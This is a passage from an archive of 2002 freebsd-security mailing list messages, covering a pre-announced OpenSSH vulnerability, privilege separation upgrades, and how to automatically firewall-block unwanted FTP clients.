<5.1.1.6.2.20020624164701.041d6ec0@pop3s.schulte.org> Message-ID: <20020624181855.Y550-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Christopher Schulte wrote: > offtopic: If this is legit, why is ISS working with the OpenBSD and OpenSSH > people, after giving Apache such a run last week? Curious. They probably couldn't figure out the OpenSSH code. :) Or they learned from the 100s of angry OpenSource people yelling at them. -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 15:21:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 88DD237B41C for ; Mon, 24 Jun 2002 15:20:46 -0700 (PDT) Received: (qmail 400 invoked by uid 1000); 24 Jun 2002 22:20:40 -0000 Date: Mon, 24 Jun 2002 16:20:40 -0600 From: "Dalin S. Owen" To: Jason DiCioccio Cc: freebsd-security@freebsd.org Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020624162040.A280@nexusxi.com> References: <2147483647.1024930479@[192.168.4.154]> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="8t9RHnE3ZwKMSgU+" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <2147483647.1024930479@[192.168.4.154]>; from geniusj@bluenugget.net on Mon, Jun 24, 2002 at 02:54:39PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --8t9RHnE3ZwKMSgU+ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable FreeBSD's OpenSSH is too old, it doesn't have PrivSep.. :( So firewall you= r port 22 guys. :) On Mon, Jun 24, 2002 at 02:54:39PM -0700, Jason DiCioccio wrote: > ---------- Forwarded Message ---------- > Date: Monday, June 24, 2002 11:06 PM +0200 > From: Markus Friedl > To: openssh-unix-announce@mindrot.org, openssh-unix-dev@mindrot.org > Subject: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability >=20 > On Mon, Jun 24, 2002 at 03:00:10PM -0600, Theo de Raadt wrote: > > Date: Mon, 24 Jun 2002 15:00:10 -0600 > > From: Theo de Raadt > > Subject: Upcoming OpenSSH vulnerability > > To: bugtraq@securityfocus.com > > Cc: announce@openbsd.org > > Cc: dsi@iss.net > > Cc: misc@openbsd.org > > > > There is an upcoming OpenSSH vulnerability that we're working on with > > ISS. Details will be published early next week. > > > > However, I can say that when OpenSSH's sshd(8) is running with priv > > seperation, the bug cannot be exploited. > > > > OpenSSH 3.3p was released a few days ago, with various improvements > > but in particular, it significantly improves the Linux and Solaris > > support for priv sep. However, it is not yet perfect. Compression is > > disabled on some systems, and the many varieties of PAM are causing > > major headaches. > > > > However, everyone should update to OpenSSH 3.3 immediately, and enable > > priv seperation in their ssh daemons, by setting this in your > > /etc/ssh/sshd_config file: > > > [...] > > > > OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away. > > On OpenBSD privsep works flawlessly, and I have reports that is also > > true on NetBSD. All other systems appear to have minor or major > > weaknesses when this code is running. >=20 > I know theo did not mention FreeBSD, but does anyone know for sure if=20 > FreeBSD is one of the platforms with major/minor weaknesses in the privse= p=20 > code? And if it is major, or minor? ;-) >=20 > Cheers, > -JD- >=20 > -- > Jason DiCioccio - jd@bluenugget.net - Useless .sig > Open Domain Service - geniusj@ods.org - http://www.ods.org/ > Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/ >=20 > PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --=20 Regards, Dalin S. Owen Nexus XI Corp. Email: dowen@nexusxi.com Web: http://www.nexusxi.com/ --8t9RHnE3ZwKMSgU+ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj0XmzcACgkQKZhyFXMVXuItXgCgvsne444w3fsDPf22moHkBZd8 jDsAoL2+ahgcWCK4bs82rxORpjUBzs7/ =7oSb -----END PGP SIGNATURE----- --8t9RHnE3ZwKMSgU+-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 15:22:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (bluenugget.net [64.32.175.43]) by hub.freebsd.org (Postfix) with ESMTP id 72B2E37B403 for ; Mon, 24 Jun 2002 15:22:30 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by bluenugget.net (Postfix) with ESMTP id 6FF2A1360C; Mon, 24 Jun 2002 15:23:54 -0700 (PDT) Date: Mon, 24 Jun 2002 15:22:26 -0700 From: Jason DiCioccio Reply-To: Jason DiCioccio To: Matt Piechota Cc: freebsd-security@FreeBSD.ORG Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <2147483647.1024932146@[192.168.4.154]> In-Reply-To: <20020624181545.C550-100000@cithaeron.argolis.org> References: <20020624181545.C550-100000@cithaeron.argolis.org> X-Mailer: Mulberry/3.0.0a2 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --On Monday, June 24, 2002 6:18 PM -0400 Matt Piechota wrote: > Does this reset OpenBSD's 4-years without a root hole? :) Probably not.. From what I've seen, that goes based on the latest release, and I *think* the latest release of openbsd has privsep enabled by default. Then again, isn't apache enabled by default on openbsd? Or just installed by default? -- Jason DiCioccio - jd@bluenugget.net - Useless .sig Open Domain Service - geniusj@ods.org - http://www.ods.org/ Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/ PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 15:30: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (bluenugget.net [64.32.175.43]) by hub.freebsd.org (Postfix) with ESMTP id 4592037B4CD for ; Mon, 24 Jun 2002 15:28:34 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by bluenugget.net (Postfix) with ESMTP id 050691360C; Mon, 24 Jun 2002 15:29:59 -0700 (PDT) Date: Mon, 24 Jun 2002 15:28:30 -0700 From: Jason DiCioccio Reply-To: Jason DiCioccio To: "Dalin S. Owen" Cc: freebsd-security@freebsd.org Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <2147483647.1024932510@[192.168.4.154]> In-Reply-To: <20020624162040.A280@nexusxi.com> References: <2147483647.1024930479@[192.168.4.154]> <20020624162040.A280@nexusxi.com> X-Mailer: Mulberry/3.0.0a2 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --On Monday, June 24, 2002 4:20 PM -0600 "Dalin S. Owen" wrote: > > FreeBSD's OpenSSH is too old, it doesn't have PrivSep.. :( So firewall > your port 22 guys. :) Oops, I knew that much ;).. I meant the port. Are there were any known minor/major issues with privsep in FreeBSD. Cheers, -JD- -- Jason DiCioccio - jd@bluenugget.net - Useless .sig Open Domain Service - geniusj@ods.org - http://www.ods.org/ Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/ PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 15:36:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id 4931C37B716 for ; Mon, 24 Jun 2002 15:36:16 -0700 (PDT) Date: Mon, 24 Jun 2002 18:36:14 -0400 From: Klaus Steden To: freebsd-security@FreeBSD.ORG Subject: automated blackholing Message-ID: <20020624183614.J589@cthulu.compt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I've got a situation with one of my servers at work that gets script kiddies attempting to use it as a warez repository. It worked once, for about three days, but I guess the hostname/address is still in someone's list of good targets. I've been using tcpd to block access, but I'm getting a little more annoyed by now and would like to start blackholing these people as soon as they attempt to connect. I've got my list of hosts to refuse - what's the best way to automatically disappear when one of them tries to connect? thanks, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 15:42: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from exchange.corp.cre8.com (ns.cre8.com [216.135.81.2]) by hub.freebsd.org (Postfix) with ESMTP id DD43037B404 for ; Mon, 24 Jun 2002 15:41:55 -0700 (PDT) Received: by exchange.corp.cre8.com with Internet Mail Service (5.5.2653.19) id ; Mon, 24 Jun 2002 18:41:59 -0400 Message-ID: <2F6DCE1EFAB3BC418B5C324F13934C96016C9E95@exchange.corp.cre8.com> From: Scott Ullrich To: 'Klaus Steden' , freebsd-security@FreeBSD.ORG Subject: RE: automated blackholing Date: Mon, 24 Jun 2002 18:41:58 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C21BD0.591CC380" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C21BD0.591CC380 Content-Type: text/plain; charset="iso-8859-1" This may be a good job for D. J. Bernstein's ucspi-tcp. Using a DNS server, tcpserver (http://cr.yp.to/ucspi-tcp/tcpserver.html) and rblsmtpd (http://cr.yp.to/ucspi-tcp/rblsmtpd.html). I currently do this for spam but it would not be hard to hack this for your situation. Hope this helps, Scott > -----Original Message----- > From: Klaus Steden [mailto:klaus@compt.com] > Sent: Monday, June 24, 2002 6:36 PM > To: freebsd-security@FreeBSD.ORG > Subject: automated blackholing > > > Hi, > > I've got a situation with one of my servers at work that gets > script kiddies > attempting to use it as a warez repository. It worked once, > for about three > days, but I guess the hostname/address is still in someone's > list of good > targets. I've been using tcpd to block access, but I'm > getting a little more > annoyed by now and would like to start blackholing these > people as soon as > they attempt to connect. > > I've got my list of hosts to refuse - what's the best way to > automatically > disappear when one of them tries to connect? > > thanks, > Klaus > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ------_=_NextPart_001_01C21BD0.591CC380 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable RE: automated blackholing

This may be a good job for D. J. Bernstein's = ucspi-tcp.  Using a DNS server, tcpserver (http://cr.yp.to/ucspi-tcp/tcpserver.html) and = rblsmtpd (http://cr.yp.to/ucspi-tcp/rblsmtpd.html).

I currently do this for spam but it would not be hard = to hack this for your situation.

Hope this helps,

Scott


> -----Original Message-----
> From: Klaus Steden [mailto:klaus@compt.com]
> Sent: Monday, June 24, 2002 6:36 PM
> To: freebsd-security@FreeBSD.ORG
> Subject: automated blackholing
>
>
> Hi,
>
> I've got a situation with one of my servers at = work that gets
> script kiddies
> attempting to use it as a warez repository. It = worked once,
> for about three
> days, but I guess the hostname/address is still = in someone's
> list of good
> targets. I've been using tcpd to block access, = but I'm
> getting a little more
> annoyed by now and would like to start = blackholing these
> people as soon as
> they attempt to connect.
>
> I've got my list of hosts to refuse - what's = the best way to
> automatically
> disappear when one of them tries to = connect?
>
> thanks,
> Klaus
>
> To Unsubscribe: send mail to = majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" = in the body of the message
>

------_=_NextPart_001_01C21BD0.591CC380-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 15:48:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 2B95E37B40D for ; Mon, 24 Jun 2002 15:48:42 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id B1F5B3A; Mon, 24 Jun 2002 17:48:41 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5OMmfiD043060; Mon, 24 Jun 2002 17:48:41 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5OMmfJ6043059; Mon, 24 Jun 2002 17:48:41 -0500 (CDT) Date: Mon, 24 Jun 2002 17:48:41 -0500 From: "Jacques A. Vidrine" To: Matt Piechota Cc: freebsd-security@FreeBSD.ORG Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020624224841.GC42982@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Matt Piechota , freebsd-security@FreeBSD.ORG References: <2147483647.1024930479@[192.168.4.154]> <20020624181545.C550-100000@cithaeron.argolis.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624181545.C550-100000@cithaeron.argolis.org> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 06:18:33PM -0400, Matt Piechota wrote: > Hopefully someone that is 'in' on the bug can give us a hint without > giving away too much before the patch, at least so we can prepare to patch > and rebuild. Nobody is `in' on the bug. The OpenSSH team has given details to no one so far, so we are assured to be blindsided. I'm afraid security contacts with various projects and vendors know no more than what was said in the bugtraq posting. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 16:14:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id 4ECA737B400 for ; Mon, 24 Jun 2002 16:14:36 -0700 (PDT) Received: (qmail 36610 invoked by uid 1000); 24 Jun 2002 23:14:31 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 24 Jun 2002 23:14:31 -0000 Date: Mon, 24 Jun 2002 16:14:30 -0700 (PDT) From: Jason Stone X-X-Sender: To: Klaus Steden Cc: Subject: Re: automated blackholing In-Reply-To: <20020624183614.J589@cthulu.compt.com> Message-ID: <20020624160440.E40482-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > I've got my list of hosts to refuse - what's the best way to > automatically disappear when one of them tries to connect? "/sbin/ipfw add deny ip from to any" -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9F6fWswXMWWtptckRAnZbAJ4t3mIhf46KOSy+zatKezL6CGz/MQCg3+ur +3rucHJfCELN/B/2WljvYhU= =5ZqC -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 16:26:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id DA2B337B400; Mon, 24 Jun 2002 16:26:29 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5ONRBLI012690; Mon, 24 Jun 2002 17:27:12 -0600 (MDT) Message-Id: <200206242327.g5ONRBLI012690@cvs.openbsd.org> To: nectar@FreeBSD.ORG Cc: freebsd-security@FreeBSD.ORG Subject: Hogwash Date: Mon, 24 Jun 2002 17:27:11 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Nobody is `in' on the bug. The OpenSSH team has given details to no > one so far, so we are assured to be blindsided. I'm afraid security > contacts with various projects and vendors know no more than what was > said in the bugtraq posting. Bullshit. You have been told to move up to privsep so that you are immunized by the time the bug is released. If you fail to immunize your users, then the best you can do is tell them to disable OpenSSH until 3.4 is out early next week with the bugfix in it. Of course, then the bug will be public. I am not nearly naive enough to believe that we can release a patch for this issue to any vendor, and have it not leak immediately. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 16:36:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by hub.freebsd.org (Postfix) with SMTP id 1257837B401 for ; Mon, 24 Jun 2002 16:36:23 -0700 (PDT) Received: (qmail 25907 invoked from network); 24 Jun 2002 23:36:14 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 24 Jun 2002 23:36:14 -0000 Received: (qmail 2422 invoked by uid 1000); 24 Jun 2002 23:38:17 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 24 Jun 2002 23:38:17 -0000 Date: Mon, 24 Jun 2002 16:38:17 -0700 (PDT) From: Brian Behlendorf To: "Dalin S. Owen" Cc: Jason DiCioccio , Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <20020624162040.A280@nexusxi.com> Message-ID: <20020624163538.H10398-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Dalin S. Owen wrote: > FreeBSD's OpenSSH is too old, it doesn't have PrivSep.. :( So firewall > your port 22 guys. :) I upgraded to openssh-portable 3.3p1 from ports; note that this morning the port was updated to build openssl 0.9.6d as well, rather than use FreeBSD's openssl libs. I also had to enable privsep; this requires creating an sshd user & group, and creating an empty /var/empty/ for the priv separator to chroot to. Hopefully the openssh-portable port can be updated to create that account & dir at some point, since privsep is on now be default. Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 16:47:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by hub.freebsd.org (Postfix) with SMTP id 498D637B400 for ; Mon, 24 Jun 2002 16:47:31 -0700 (PDT) Received: (qmail 29235 invoked from network); 24 Jun 2002 23:47:22 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 24 Jun 2002 23:47:22 -0000 Received: (qmail 4394 invoked by uid 1000); 24 Jun 2002 23:49:23 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 24 Jun 2002 23:49:23 -0000 Date: Mon, 24 Jun 2002 16:49:23 -0700 (PDT) From: Brian Behlendorf To: security@freebsd.org Subject: UseLogin and openssh-portable priv separation Message-ID: <20020624164234.E10398-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I prefer to use UseLogin in sshd_config so I can pick some login.conf settings. It appears I needed to turn that off in order to get the privilege separation in openssh 3.3 to work, where there's a much smaller segment of code that runs root rather than the whole sshd child. Anyone know whether it's possible to reconcile the two? Or a reliable way to set the MAIL variable for all users, independent of the shells they're using, which is all I care about at this point. Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 16:50:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id A2EF137B409 for ; Mon, 24 Jun 2002 16:49:21 -0700 (PDT) Date: Mon, 24 Jun 2002 19:49:18 -0400 From: Klaus Steden To: freebsd-security@FreeBSD.ORG Subject: Re: automated blackholing Message-ID: <20020624194918.N589@cthulu.compt.com> References: <20020624183614.J589@cthulu.compt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624183614.J589@cthulu.compt.com>; from klaus@compt.com on Mon, Jun 24, 2002 at 06:36:14PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Okay, my apologies. I should have clarified what I'm looking to implement ... Essentially, it's this - I've got a list of clients I deny FTP access to by default (from my /etc/hosts.deny file). I'd sooner just blackhole them, but some are from large netblocks, and I'd rather blackhole individual IPs as they show up. Maybe I'm using the velvet gloves when it's not necessary, but anyway ... I was discussing this with an acquaintance who uses portsentry, configured to blackhole immediately anyone connecting to a port with no service running on it (i.e. the echo port). My situation is a little different, in that I've got a service actually running (FTP) that people need to connect to legitimately, but I'd like to blackhole illegitimate requests as they appear, rather than using TCP wrappers to disconnect them. I'm looking for something that can combine a blacklist created by me to blackhole someone connecting if he's found in the blacklist, without having to manually add blackhole routes or ipfw rules as these requests turn up - I'm only on duty 18 hours a day after all ;> Anyone done something like this before? It's sort of a back-asswards combination of existing scenarios, but it seems possible ... thanks, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 16:56: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from exchange.corp.cre8.com (ns.cre8.com [216.135.81.2]) by hub.freebsd.org (Postfix) with ESMTP id 75E6B37B400 for ; Mon, 24 Jun 2002 16:55:53 -0700 (PDT) Received: by exchange.corp.cre8.com with Internet Mail Service (5.5.2653.19) id ; Mon, 24 Jun 2002 19:55:56 -0400 Message-ID: <2F6DCE1EFAB3BC418B5C324F13934C96016C9E96@exchange.corp.cre8.com> From: Scott Ullrich To: 'Klaus Steden' , freebsd-security@FreeBSD.ORG Subject: RE: automated blackholing Date: Mon, 24 Jun 2002 19:55:55 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C21BDA.AE161B20" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C21BDA.AE161B20 Content-Type: text/plain; charset="iso-8859-1" FWIW, this could be done very easily with snort and the guardian perl script. You could simply craft a snort rule for the particular port and then change guardian to lookup host ip's on detection of the rule. If they are listed in the file, deny them with ipfw. Is this more up your alley? -Scott > -----Original Message----- > From: Klaus Steden [mailto:klaus@compt.com] > Sent: Monday, June 24, 2002 7:49 PM > To: freebsd-security@FreeBSD.ORG > Subject: Re: automated blackholing > > > Okay, my apologies. I should have clarified what I'm looking > to implement ... > > Essentially, it's this - I've got a list of clients I deny > FTP access to by > default (from my /etc/hosts.deny file). I'd sooner just > blackhole them, but > some are from large netblocks, and I'd rather blackhole > individual IPs as they > show up. Maybe I'm using the velvet gloves when it's not > necessary, but anyway > ... > > I was discussing this with an acquaintance who uses > portsentry, configured to > blackhole immediately anyone connecting to a port with no > service running on > it (i.e. the echo port). My situation is a little different, > in that I've got > a service actually running (FTP) that people need to connect > to legitimately, > but I'd like to blackhole illegitimate requests as they > appear, rather than > using TCP wrappers to disconnect them. > > I'm looking for something that can combine a blacklist > created by me to > blackhole someone connecting if he's found in the blacklist, > without having to > manually add blackhole routes or ipfw rules as these requests > turn up - I'm > only on duty 18 hours a day after all ;> > > Anyone done something like this before? It's sort of a back-asswards > combination of existing scenarios, but it seems possible ... > > thanks, > Klaus > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ------_=_NextPart_001_01C21BDA.AE161B20 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable RE: automated blackholing

FWIW, this could be done very easily with snort and = the guardian perl script.  You could simply craft a snort rule for = the particular port and then change guardian to lookup host ip's on = detection of the rule. If they are listed in the file, deny them with = ipfw.

Is this more up your alley?

-Scott



> -----Original Message-----
> From: Klaus Steden [mailto:klaus@compt.com]
> Sent: Monday, June 24, 2002 7:49 PM
> To: freebsd-security@FreeBSD.ORG
> Subject: Re: automated blackholing
>
>
> Okay, my apologies. I should have clarified = what I'm looking
> to implement ...
>
> Essentially, it's this - I've got a list of = clients I deny
> FTP access to by
> default (from my /etc/hosts.deny file). I'd = sooner just
> blackhole them, but
> some are from large netblocks, and I'd rather = blackhole
> individual IPs as they
> show up. Maybe I'm using the velvet gloves when = it's not
> necessary, but anyway
> ...
>
> I was discussing this with an acquaintance who = uses
> portsentry, configured to
> blackhole immediately anyone connecting to a = port with no
> service running on
> it (i.e. the echo port). My situation is a = little different,
> in that I've got
> a service actually running (FTP) that people = need to connect
> to legitimately,
> but I'd like to blackhole illegitimate requests = as they
> appear, rather than
> using TCP wrappers to disconnect them.
>
> I'm looking for something that can combine a = blacklist
> created by me to
> blackhole someone connecting if he's found in = the blacklist,
> without having to
> manually add blackhole routes or ipfw rules as = these requests
> turn up - I'm
> only on duty 18 hours a day after all = ;>
>
> Anyone done something like this before? It's = sort of a back-asswards
> combination of existing scenarios, but it seems = possible ...
>
> thanks,
> Klaus
>
> To Unsubscribe: send mail to = majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" = in the body of the message
>

------_=_NextPart_001_01C21BDA.AE161B20-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 17:15: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id 72F3A37B400 for ; Mon, 24 Jun 2002 17:15:05 -0700 (PDT) Date: Mon, 24 Jun 2002 20:15:00 -0400 From: Klaus Steden To: Scott Ullrich Cc: freebsd-security@FreeBSD.ORG Subject: Re: automated blackholing Message-ID: <20020624201500.P589@cthulu.compt.com> References: <2F6DCE1EFAB3BC418B5C324F13934C96016C9E96@exchange.corp.cre8.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <2F6DCE1EFAB3BC418B5C324F13934C96016C9E96@exchange.corp.cre8.com>; from sullrich@CRE8.COM on Mon, Jun 24, 2002 at 07:55:55PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > FWIW, this could be done very easily with snort and the guardian perl > script. You could simply craft a snort rule for the particular port and > then change guardian to lookup host ip's on 